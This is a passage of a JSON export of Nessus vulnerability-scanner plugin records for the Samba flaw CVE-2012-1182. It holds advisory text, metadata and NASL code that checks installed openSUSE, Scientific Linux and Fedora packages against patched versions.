"p-cpe:/a:novell:opensuse:samba-client-32bit", "p-cpe:/a:novell:opensuse:libwbclient0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libtdb1-32bit", "p-cpe:/a:novell:opensuse:libtevent0-32bit", "p-cpe:/a:novell:opensuse:libldb1", "p-cpe:/a:novell:opensuse:libldb1-debuginfo", "p-cpe:/a:novell:opensuse:libtdb-devel", "p-cpe:/a:novell:opensuse:libwbclient0-32bit", "p-cpe:/a:novell:opensuse:libtdb1", "p-cpe:/a:novell:opensuse:samba-krb-printing-debuginfo", "p-cpe:/a:novell:opensuse:libtalloc-devel", 
"p-cpe:/a:novell:opensuse:libsmbsharemodes0-debuginfo", "p-cpe:/a:novell:opensuse:libsmbclient0-32bit", "p-cpe:/a:novell:opensuse:libldb1-debuginfo-32bit", "p-cpe:/a:novell:opensuse:samba-winbind", "p-cpe:/a:novell:opensuse:libwbclient0-debuginfo", "cpe:/o:novell:opensuse:11.4", "p-cpe:/a:novell:opensuse:libtdb1-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libldb1-32bit", "p-cpe:/a:novell:opensuse:libwbclient-devel", "p-cpe:/a:novell:opensuse:samba-client-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libtevent0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libtalloc2", "p-cpe:/a:novell:opensuse:libsmbclient0", "p-cpe:/a:novell:opensuse:libtevent-devel", "p-cpe:/a:novell:opensuse:libtdb1-debuginfo", "p-cpe:/a:novell:opensuse:libtevent0", "p-cpe:/a:novell:opensuse:samba-debugsource", "p-cpe:/a:novell:opensuse:ldapsmb", "p-cpe:/a:novell:opensuse:libsmbclient0-debuginfo", "p-cpe:/a:novell:opensuse:samba-32bit", "p-cpe:/a:novell:opensuse:samba-client", "p-cpe:/a:novell:opensuse:samba-winbind-debuginfo", "p-cpe:/a:novell:opensuse:libtalloc2-debuginfo", "p-cpe:/a:novell:opensuse:libsmbclient0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libnetapi0-debuginfo", "p-cpe:/a:novell:opensuse:samba-client-debuginfo", "p-cpe:/a:novell:opensuse:libtalloc2-debuginfo-32bit", "p-cpe:/a:novell:opensuse:samba-winbind-32bit", "p-cpe:/a:novell:opensuse:libnetapi-devel", "p-cpe:/a:novell:opensuse:samba-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libsmbsharemodes-devel", "p-cpe:/a:novell:opensuse:libsmbsharemodes0", "p-cpe:/a:novell:opensuse:samba-krb-printing", "p-cpe:/a:novell:opensuse:libsmbclient-devel", "p-cpe:/a:novell:opensuse:libtalloc2-32bit", "p-cpe:/a:novell:opensuse:libnetapi0", "p-cpe:/a:novell:opensuse:libwbclient0", "p-cpe:/a:novell:opensuse:samba-debuginfo"], "id": "OPENSUSE-2012-224.NASL", "href": "https://www.tenable.com/plugins/nessus/74601", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this 
plugin were\n# extracted from openSUSE Security Update openSUSE-2012-224.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(74601);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2012-1182\");\n\n script_name(english:\"openSUSE Security Update : samba (openSUSE-SU-2012:0508-1)\");\n script_summary(english:\"Check for the openSUSE-2012-224 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Samba upgrade to version 3.6.3 fixes the following security issue :\n\n - PIDL based autogenerated code allows overwriting beyond\n of allocated array. Remove attackers could exploit that\n to execute arbitrary code as root (CVE-2012-1182,\n bso#8815, bnc#752797)\n\nPlease see /usr/share/doc/packages/samba/WHATSNEW.txt from the\nsamba-doc package or the package change log (rpm -q --changelog samba)\nfor more details of the version update.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=752797\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2012-04/msg00036.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected samba packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n 
script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ldapsmb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libldb-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libldb1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libldb1-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libldb1-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libldb1-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbsharemodes-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbsharemodes0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbsharemodes0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:libtalloc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtalloc2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtalloc2-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtalloc2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtalloc2-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtdb-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtdb1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtdb1-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtdb1-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtdb1-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-client-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-client-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-client-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-krb-printing\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-krb-printing-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-winbind-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-winbind-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-winbind-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.4)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.4\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.4\", reference:\"ldapsmb-1.34b-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libldb-devel-1.0.2-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libldb1-1.0.2-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libldb1-debuginfo-1.0.2-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libnetapi-devel-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libnetapi0-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libnetapi0-debuginfo-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libsmbclient-devel-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libsmbclient0-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libsmbclient0-debuginfo-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libsmbsharemodes-devel-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", 
reference:\"libsmbsharemodes0-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libsmbsharemodes0-debuginfo-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libtalloc-devel-2.0.5-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libtalloc2-2.0.5-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libtalloc2-debuginfo-2.0.5-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libtdb-devel-1.2.9-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libtdb1-1.2.9-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libtdb1-debuginfo-1.2.9-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libtevent-devel-0.9.11-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libtevent0-0.9.11-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libtevent0-debuginfo-0.9.11-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libwbclient-devel-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libwbclient0-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"libwbclient0-debuginfo-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"samba-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"samba-client-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"samba-client-debuginfo-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"samba-debuginfo-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"samba-debugsource-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"samba-devel-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"samba-krb-printing-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"samba-krb-printing-debuginfo-3.6.3-112.1\") ) flag++;\nif ( 
rpm_check(release:\"SUSE11.4\", reference:\"samba-winbind-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"samba-winbind-debuginfo-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"libldb1-32bit-1.0.2-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"libldb1-debuginfo-32bit-1.0.2-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"libsmbclient0-32bit-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"libsmbclient0-debuginfo-32bit-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"libtalloc2-32bit-2.0.5-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"libtalloc2-debuginfo-32bit-2.0.5-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"libtdb1-32bit-1.2.9-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"libtdb1-debuginfo-32bit-1.2.9-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"libtevent0-32bit-0.9.11-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"libtevent0-debuginfo-32bit-0.9.11-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"libwbclient0-32bit-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"libwbclient0-debuginfo-32bit-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"samba-32bit-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"samba-client-32bit-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"samba-client-debuginfo-32bit-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"samba-debuginfo-32bit-3.6.3-112.1\") ) flag++;\nif ( 
rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"samba-winbind-32bit-3.6.3-112.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", cpu:\"x86_64\", reference:\"samba-winbind-debuginfo-32bit-3.6.3-112.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ldapsmb / libldb-devel / libldb1 / libldb1-32bit / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:46:32", "description": "Samba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nA flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler,\nused to generate code to handle RPC calls, resulted in multiple buffer\noverflows in Samba. A remote, unauthenticated attacker could send a\nspecially crafted RPC request that would cause the Samba daemon (smbd)\nto crash or, possibly, execute arbitrary code with the privileges of\nthe root user. (CVE-2012-1182)\n\nUsers of Samba are advised to upgrade to these updated packages, which\ncontain a backported patch to resolve this issue. 
After installing\nthis update, the smb service will be restarted automatically.", "edition": 15, "published": "2012-08-01T00:00:00", "title": "Scientific Linux Security Update : samba3x on SL5.x i386/x86_64 (20120410)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-1182"], "modified": "2012-08-01T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:samba3x-doc", "p-cpe:/a:fermilab:scientific_linux:samba3x-domainjoin-gui", "p-cpe:/a:fermilab:scientific_linux:samba3x-winbind", "p-cpe:/a:fermilab:scientific_linux:samba3x-debuginfo", "p-cpe:/a:fermilab:scientific_linux:samba3x-common", "p-cpe:/a:fermilab:scientific_linux:samba3x-swat", "p-cpe:/a:fermilab:scientific_linux:samba3x", "x-cpe:/o:fermilab:scientific_linux", "p-cpe:/a:fermilab:scientific_linux:samba3x-winbind-devel", "p-cpe:/a:fermilab:scientific_linux:samba3x-client"], "id": "SL_20120410_SAMBA3X_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/nessus/61297", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(61297);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2012-1182\");\n\n script_name(english:\"Scientific Linux Security Update : samba3x on SL5.x i386/x86_64 (20120410)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Samba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nA flaw in the Samba suite's Perl-based 
DCE/RPC IDL (PIDL) compiler,\nused to generate code to handle RPC calls, resulted in multiple buffer\noverflows in Samba. A remote, unauthenticated attacker could send a\nspecially crafted RPC request that would cause the Samba daemon (smbd)\nto crash or, possibly, execute arbitrary code with the privileges of\nthe root user. (CVE-2012-1182)\n\nUsers of Samba are advised to upgrade to these updated packages, which\ncontain a backported patch to resolve this issue. After installing\nthis update, the smb service will be restarted automatically.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1204&L=scientific-linux-errata&T=0&P=565\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6fceb855\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba3x\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba3x-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba3x-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba3x-debuginfo\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba3x-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba3x-domainjoin-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba3x-swat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba3x-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:samba3x-winbind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 5.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"samba3x-3.5.10-0.108.el5_8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"samba3x-client-3.5.10-0.108.el5_8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"samba3x-common-3.5.10-0.108.el5_8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"samba3x-debuginfo-3.5.10-0.108.el5_8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"samba3x-doc-3.5.10-0.108.el5_8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"samba3x-domainjoin-gui-3.5.10-0.108.el5_8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"samba3x-swat-3.5.10-0.108.el5_8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"samba3x-winbind-3.5.10-0.108.el5_8\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"samba3x-winbind-devel-3.5.10-0.108.el5_8\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba3x / samba3x-client / samba3x-common / samba3x-debuginfo / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:10:34", "description": "This update fixes CVE-2012-1182. Rebuilt to run with pytalloc 2.0.6\nNew samba4 alpha release.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 14, "published": "2012-05-16T00:00:00", "title": "Fedora 16 : samba4-4.0.0-38.alpha16.fc16 (2012-6382)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-1182"], "modified": "2012-05-16T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:samba4", "cpe:/o:fedoraproject:fedora:16"], "id": "FEDORA_2012-6382.NASL", "href": "https://www.tenable.com/plugins/nessus/59098", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-6382.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59098);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-1182\");\n script_bugtraq_id(52973);\n script_xref(name:\"FEDORA\", value:\"2012-6382\");\n\n script_name(english:\"Fedora 16 : samba4-4.0.0-38.alpha16.fc16 (2012-6382)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes CVE-2012-1182. Rebuilt to run with pytalloc 2.0.6\nNew samba4 alpha release.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
